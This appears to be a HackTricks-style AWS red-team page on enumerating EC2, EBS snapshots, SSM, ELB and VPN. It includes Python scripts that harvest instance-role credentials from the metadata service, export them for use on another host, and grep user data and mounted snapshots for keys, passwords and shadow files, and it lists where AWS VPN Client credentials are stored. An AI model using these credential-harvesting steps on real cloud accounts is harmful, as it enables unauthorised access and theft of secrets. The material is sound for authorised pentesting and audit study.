AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn what a VPC is and about its components in:
AWS - VPC & Networking Basic Information

Amazon EC2 is the service used to launch virtual servers (instances). It lets you configure their security and networking and manage their storage, and capacity can be scaled up and down as demand changes, so precise traffic forecasting is not required.
Interesting things to enumerate in EC2:
Virtual Machines
SSH Keys
User Data
Existing EC2s/AMIs/Snapshots
Networking
Networks
Subnetworks
Public IPs
Open ports
Integrated connections with other networks outside AWS
Using roles to grant permissions to applications that run on EC2 instances requires a bit of extra configuration. An application running on an EC2 instance is separated from AWS by the virtualized operating system, so an additional step is needed to assign an AWS role and its permissions to the instance and make them available to the applications on it.
That extra step is the creation of an instance profile attached to the instance. The instance profile contains the role and hands the role's temporary credentials to any application running on the instance, which then uses them in its API calls; access is limited to whatever the role's policies allow. Only one role can be assigned to an EC2 instance at a time, and every process on the instance shares that role and its permissions: anything that can reach the metadata endpoint from the instance (including an SSRF in a web application hosted there) can obtain those credentials.
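The enumeration checklist above (instance profile, SSH key name, public IP, security groups, user data) can be triaged offline from the JSON that `aws ec2 describe-instances` and `aws ec2 describe-instance-attribute --attribute userData` return. The following is an added example, not code from the original page: it parses constructed sample output (the instance IDs, ARNs, IPs and the user-data script are made up), flags instances that still allow IMDSv1, decodes the base64 user data and greps it for the kinds of secrets that commonly leak there. The secret-indicator regexes are a starting set chosen for this example, not an exhaustive list.

```python
import base64
import json
import re

# Constructed sample in the shape of `aws ec2 describe-instances` output (not real data).
SAMPLE_DESCRIBE_INSTANCES = json.dumps({
    "Reservations": [{"Instances": [
        {
            "InstanceId": "i-0123456789abcdef0",
            "State": {"Name": "running"},
            "PublicIpAddress": "203.0.113.10",
            "PrivateIpAddress": "10.0.1.25",
            "KeyName": "prod-bastion",
            "IamInstanceProfile": {
                "Arn": "arn:aws:iam::123456789012:instance-profile/WebServerProfile"},
            "SecurityGroups": [{"GroupId": "sg-0a1b2c3d", "GroupName": "web-public"}],
            "SubnetId": "subnet-0abc", "VpcId": "vpc-0def",
            "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional"},
        },
        {
            "InstanceId": "i-0fedcba9876543210",
            "State": {"Name": "running"},
            "PrivateIpAddress": "10.0.2.40",
            "SecurityGroups": [],
            "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required"},
        },
    ]}]
})

# Constructed sample of `aws ec2 describe-instance-attribute --attribute userData`
# output; the Value field is the base64-encoded boot script.
_USER_DATA_SCRIPT = (
    "#!/bin/bash\n"
    "export DB_PASSWORD='hunter2'\n"
    "aws configure set aws_access_key_id AKIAIOSFODNN7EXAMPLE\n"
)
SAMPLE_USER_DATA = json.dumps({
    "InstanceId": "i-0123456789abcdef0",
    "UserData": {"Value": base64.b64encode(_USER_DATA_SCRIPT.encode()).decode()},
})

# Indicators worth flagging in user data (a starting set, not exhaustive).
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b"),
    "password_assignment": re.compile(r"(?i)(?:password|passwd|pwd)\s*[=:]\s*\S+"),
    "private_key": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}


def triage_instances(describe_json):
    """One summary dict per instance with the fields that matter for enumeration."""
    findings = []
    for reservation in json.loads(describe_json)["Reservations"]:
        for inst in reservation["Instances"]:
            profile_arn = (inst.get("IamInstanceProfile") or {}).get("Arn")
            md = inst.get("MetadataOptions", {})
            findings.append({
                "instance_id": inst["InstanceId"],
                "state": inst.get("State", {}).get("Name"),
                "public_ip": inst.get("PublicIpAddress"),
                "private_ip": inst.get("PrivateIpAddress"),
                "ssh_key": inst.get("KeyName"),
                "instance_profile": profile_arn,
                # The ARN's last segment is the *profile* name; the role inside it must be
                # resolved with `aws iam get-instance-profile` (they usually, not always, match).
                "instance_profile_name": profile_arn.rsplit("/", 1)[-1] if profile_arn else None,
                "security_groups": [sg["GroupId"] for sg in inst.get("SecurityGroups", [])],
                # IMDSv1 is reachable when the endpoint is on and tokens are merely optional:
                # an SSRF on this host can then read the role credentials with a plain GET.
                "imdsv1_allowed": md.get("HttpEndpoint") == "enabled"
                                  and md.get("HttpTokens") != "required",
            })
    return findings


def decode_user_data(attribute_json):
    """Return the plaintext user-data script (empty string if none is set)."""
    value = json.loads(attribute_json).get("UserData", {}).get("Value")
    if not value:
        return ""
    return base64.b64decode(value).decode("utf-8", errors="replace")


def find_secrets(text):
    """List (indicator, matched text) pairs found in a blob of user data."""
    return [(name, m.group(0)) for name, pat in SECRET_PATTERNS.items()
            for m in pat.finditer(text)]


if __name__ == "__main__":
    for row in triage_instances(SAMPLE_DESCRIBE_INSTANCES):
        print(row)
    script = decode_user_data(SAMPLE_USER_DATA)
    for indicator, match in find_secrets(script):
        print(f"[user-data] {indicator}: {match}")
```

To run it against a real account, pipe the CLI output into `triage_instances` and `decode_user_data` instead of the constructed samples; user data must be fetched per instance, since `describe-instances` does not include it.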
AWS EC2 metadata is information about an EC2 instance that the instance can read about itself at runtime from the Instance Metadata Service (IMDS) at http://169.254.169.254. It includes the instance ID, the availability zone, the hostname, the user data and, if an instance profile is attached, the temporary credentials of the associated IAM role. With IMDSv1 a plain GET returns all of this; IMDSv2 requires a session token obtained with a PUT request first, which is why an instance whose metadata options set HttpTokens to required is much harder to abuse through SSRF.
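The IMDSv2 exchange described above (PUT for a token, then GET with the token header, first the role name and then its credentials) as an added example; this is not code from the original page. The transport is injectable so the same flow can be exercised against a constructed in-memory simulation of an instance configured with HttpTokens=required, where an unauthenticated GET is refused with 401; the token, role name and credential values in the simulation are made up.

```python
import json
import urllib.error
import urllib.request

IMDS_BASE = "http://169.254.169.254"   # link-local, reachable only from the instance itself


def http_request(method, url, headers=None, timeout=2):
    """Real transport: returns (status, body). 4xx/5xx are returned, not raised."""
    req = urllib.request.Request(url, method=method, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode(errors="replace")


def imds_token(http=http_request, ttl=21600):
    """IMDSv2 step 1: PUT a session token (TTL capped at 6 hours by the service)."""
    status, body = http("PUT", IMDS_BASE + "/latest/api/token",
                        {"X-aws-ec2-metadata-token-ttl-seconds": str(ttl)})
    return body if status == 200 else None


def imds_get(path, token=None, http=http_request):
    """GET a metadata path; with a token this is IMDSv2, without it IMDSv1."""
    headers = {"X-aws-ec2-metadata-token": token} if token else {}
    return http("GET", IMDS_BASE + path, headers)


def fetch_role_credentials(http=http_request):
    """Walk the IMDSv2 flow and return the instance role's temporary credentials, or None."""
    token = imds_token(http)
    status, body = imds_get("/latest/meta-data/iam/security-credentials/", token, http)
    if status != 200 or not body.strip():
        return None                      # no instance profile attached
    role = body.strip().splitlines()[0]  # an instance has at most one role
    status, body = imds_get(f"/latest/meta-data/iam/security-credentials/{role}", token, http)
    if status != 200:
        return None
    creds = json.loads(body)
    return {"role": role, "AccessKeyId": creds["AccessKeyId"],
            "SecretAccessKey": creds["SecretAccessKey"], "Token": creds["Token"],
            "Expiration": creds["Expiration"]}


def as_env_exports(creds):
    """Shell lines that make the obtained credentials usable by the AWS CLI on another host."""
    return (f"export AWS_ACCESS_KEY_ID={creds['AccessKeyId']}\n"
            f"export AWS_SECRET_ACCESS_KEY={creds['SecretAccessKey']}\n"
            f"export AWS_SESSION_TOKEN={creds['Token']}\n")


# --- Constructed simulation of an instance with HttpTokens=required (no network needed) ---
_SIM_TOKEN = "AQAAAEXAMPLETOKEN"
_SIM_CREDS = {"Code": "Success", "Type": "AWS-HMAC", "AccessKeyId": "ASIAEXAMPLE12345678",
              "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
              "Token": "FwoGZXIvYXdzEXAMPLE", "Expiration": "2030-01-01T00:00:00Z"}


def simulated_imds(method, url, headers=None, timeout=2):
    """Fake transport mimicking IMDSv2-only behaviour: GETs without a valid token get 401."""
    headers = headers or {}
    if method == "PUT" and url.endswith("/latest/api/token"):
        return 200, _SIM_TOKEN
    if headers.get("X-aws-ec2-metadata-token") != _SIM_TOKEN:
        return 401, ""
    if url.endswith("/meta-data/iam/security-credentials/"):
        return 200, "WebServerRole\n"
    if url.endswith("/meta-data/iam/security-credentials/WebServerRole"):
        return 200, json.dumps(_SIM_CREDS)
    if url.endswith("/meta-data/instance-id"):
        return 200, "i-0123456789abcdef0"
    return 404, ""


if __name__ == "__main__":
    creds = fetch_role_credentials()     # real call; only works from inside an EC2 instance
    print(as_env_exports(creds) if creds else "no role credentials available")
```

The PUT step is what an SSRF usually cannot perform, which is the practical difference between the two IMDS versions; the simulated transport makes that visible without needing an instance.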
In the following page you can check how to abuse EC2 permissions to escalate privileges:
AWS - EC2 Privesc

Amazon EBS (Elastic Block Store) snapshots are static backups of EBS volumes: copies of the disks attached to an EC2 instance at a specific point in time. Snapshots can be copied across regions and accounts, restored as volumes and attached to an instance you control, or even downloaded and run locally.
Snapshots can contain sensitive information such as source code or API keys, so if you have the chance it is worth mounting and checking them.
An AMI is used to launch an EC2 instance, while an EBS snapshot is a backup of a single volume. An EBS-backed AMI is built from one or more snapshots plus the metadata needed to boot them (architecture, virtualization type, root device name, block device mapping and launch permissions). A snapshot of a root volume therefore does contain the operating system and installed software, but on its own it cannot be launched: it has to be registered as an AMI (or attached as a volume to a running instance) before its contents are usable.
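Once a snapshot has been restored to a volume and mounted on an instance you control, the mount point is just a directory tree. The following is an added example, not code from the original page, of a scanner for that tree: it lists which high-value paths exist (the path list is a starting set chosen for this example), skips pseudo-filesystems, symlinks, large files and anything that looks binary, and greps the rest for a few secret indicators. Because a real snapshot is not available offline, `build_sample_mount` creates a constructed stand-in directory with made-up files so the scanner can be run as-is.

```python
import os
import re
import tempfile

# Paths that pay off first on a mounted root-volume snapshot (relative to the mount point).
HIGH_VALUE_PATHS = [
    "etc/shadow", "root/.bash_history", "root/.ssh", "root/.aws/credentials",
    "home", "var/lib/cloud/instance/user-data.txt", "etc/environment", "var/www",
]

INDICATORS = {
    "aws_access_key_id": re.compile(rb"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b"),
    "private_key": re.compile(rb"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "aws_cli_secret": re.compile(rb"aws_secret_access_key\s*=\s*\S+"),
    "password_assignment": re.compile(rb"(?i)(?:password|passwd)\s*[=:]\s*\S+"),
}
MAX_FILE_BYTES = 4 * 1024 * 1024   # skip big binaries; grep them separately if needed


def scan_file(path):
    """Indicator names found in one file (empty list if unreadable, huge or binary-looking)."""
    try:
        if os.path.getsize(path) > MAX_FILE_BYTES:
            return []
        with open(path, "rb") as f:
            data = f.read()
    except OSError:
        return []
    if b"\x00" in data[:1024]:   # crude binary check
        return []
    return sorted({name for name, pat in INDICATORS.items() if pat.search(data)})


def scan_mount(mount_point):
    """Walk a mounted snapshot; returns {relative_path: [indicators]} for every hit."""
    hits = {}
    for root, dirs, files in os.walk(mount_point):
        dirs[:] = [d for d in dirs if d not in ("proc", "sys", "dev")]  # pseudo-fs, nothing there
        for name in files:
            full = os.path.join(root, name)
            if os.path.islink(full):
                continue
            found = scan_file(full)
            if found:
                hits[os.path.relpath(full, mount_point)] = found
    return hits


def present_high_value_paths(mount_point):
    """Which of the well-known sensitive paths exist on this snapshot."""
    return [p for p in HIGH_VALUE_PATHS if os.path.exists(os.path.join(mount_point, p))]


def build_sample_mount():
    """Constructed stand-in for a mounted snapshot (a temp dir) so the scanner runs offline."""
    root = tempfile.mkdtemp(prefix="snap_")
    files = {
        "root/.aws/credentials": b"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"
                                  b"aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n",
        "home/app/.ssh/id_rsa": b"-----BEGIN OPENSSH PRIVATE KEY-----\nAAAA...\n"
                                b"-----END OPENSSH PRIVATE KEY-----\n",
        "var/www/config.php": b"<?php $db_password = 'hunter2';\n",
        "usr/bin/busybox": b"\x7fELF\x00\x00binary junk",
        "etc/hostname": b"web-01\n",
    }
    for rel, data in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as f:
            f.write(data)
    return root


if __name__ == "__main__":
    mount = build_sample_mount()   # in practice: the directory the restored volume is mounted on
    print("check first:", present_high_value_paths(mount))
    for rel, inds in scan_mount(mount).items():
        print(f"{rel}: {', '.join(inds)}")
```

Point `scan_mount` at the real mount point (for example /mnt/snapshot) instead of the sample tree; the pattern set is deliberately small and is where you would add application-specific indicators.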
In the following page you can check how to abuse EBS permissions to escalate privileges:
AWS - EBS Privesc

Amazon Simple Systems Manager (SSM) lets you remotely manage fleets of EC2 instances, which makes administering them much easier. Each instance must be running the SSM Agent, which is the component that receives actions from the AWS API and executes them.
SSM Agent makes it possible for Systems Manager to update, manage, and configure these resources. The agent processes requests from the Systems Manager service in the AWS Cloud, and then runs them as specified in the request.
The SSM Agent comes preinstalled on some AMIs (for example Amazon Linux) and has to be installed manually on others. The IAM role used by the instance also needs a policy that lets it talk to Systems Manager, typically the managed policy AmazonSSMManagedInstanceCore (the older AmazonEC2RoleforSSM policy is deprecated).
You can check whether Systems Manager is active on an EC2 instance by looking for a running amazon-ssm-agent process.
In the following page you can check how to abuse SSM permissions to escalate privileges:
AWS - SSM Privesc

Elastic Load Balancing (ELB) is the load-balancing service for AWS deployments. It distributes incoming application traffic across its targets and scales to meet demand. When enumerating, the DNS name, listeners and target groups of each load balancer tell you which internal services are reachable from outside and on which ports.
AWS Nitro is the set of custom hardware and a lightweight hypervisor that underpins modern EC2 instances. Virtualization functions (networking, storage, security) are offloaded to dedicated Nitro cards, which shrinks the hypervisor's attack surface, improves resource efficiency and lets instances reach near bare-metal performance, which is particularly useful for resource-intensive workloads. The Nitro Security Chip specifically protects the integrity of the hardware and firmware.
Get more information and how to enumerate it from:
AWS - Nitro Enum

A VPN connects your on-premises network (Site-to-Site VPN) or your employees' laptops (Client VPN) to an AWS VPC, so services can be accessed without exposing them to the internet.
Customer Gateway:
A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection.
It is essentially a physical device or software application on your side of the Site-to-Site VPN connection.
You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway.
It serves as a reference point for setting up the VPN connection and doesn't incur additional charges.
Virtual Private Gateway:
A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection.
It is attached to your VPC and serves as the target for your VPN connection.
VPG is the AWS side endpoint for the VPN connection.
It handles the secure communication between your VPC and your on-premises network.
Site-to-Site VPN Connection:
A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel.
This type of connection requires a Customer Gateway and a Virtual Private Gateway.
It's used for secure, stable, and consistent communication between your data center or network and your AWS environment.
Typically used for regular, long-term connections; billed per connection-hour plus the data transferred over the connection.
Client VPN Endpoint:
A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions.
It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network.
It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks.
With Client VPN, each client device uses a VPN client software to establish a secure connection.
You can find more information about the benefits and components of AWS VPNs here.
Local Temporary Credentials
When the AWS VPN Client is used to connect to a VPN, the user usually logs in to AWS to get access to the VPN. Some AWS credentials are then created and stored locally to establish the VPN connection. These credentials are stored in $HOME/.config/AWSVPNClient/TemporaryCredentials/<region>/temporary-credentials.txt and contain an AccessKey, a SecretKey and a Token.
The credentials belong to the user arn:aws:sts::<acc-id>:assumed-role/aws-vpn-client-metrics-analytics-access-role/CognitoIdentityCredentials (TODO: research more about the permissions of these credentials).
ovpn config files
If a VPN connection was established you should search the system for .ovpn config files. One place where you could find them is $HOME/.config/AWSVPNClient/OpenVpnConfigs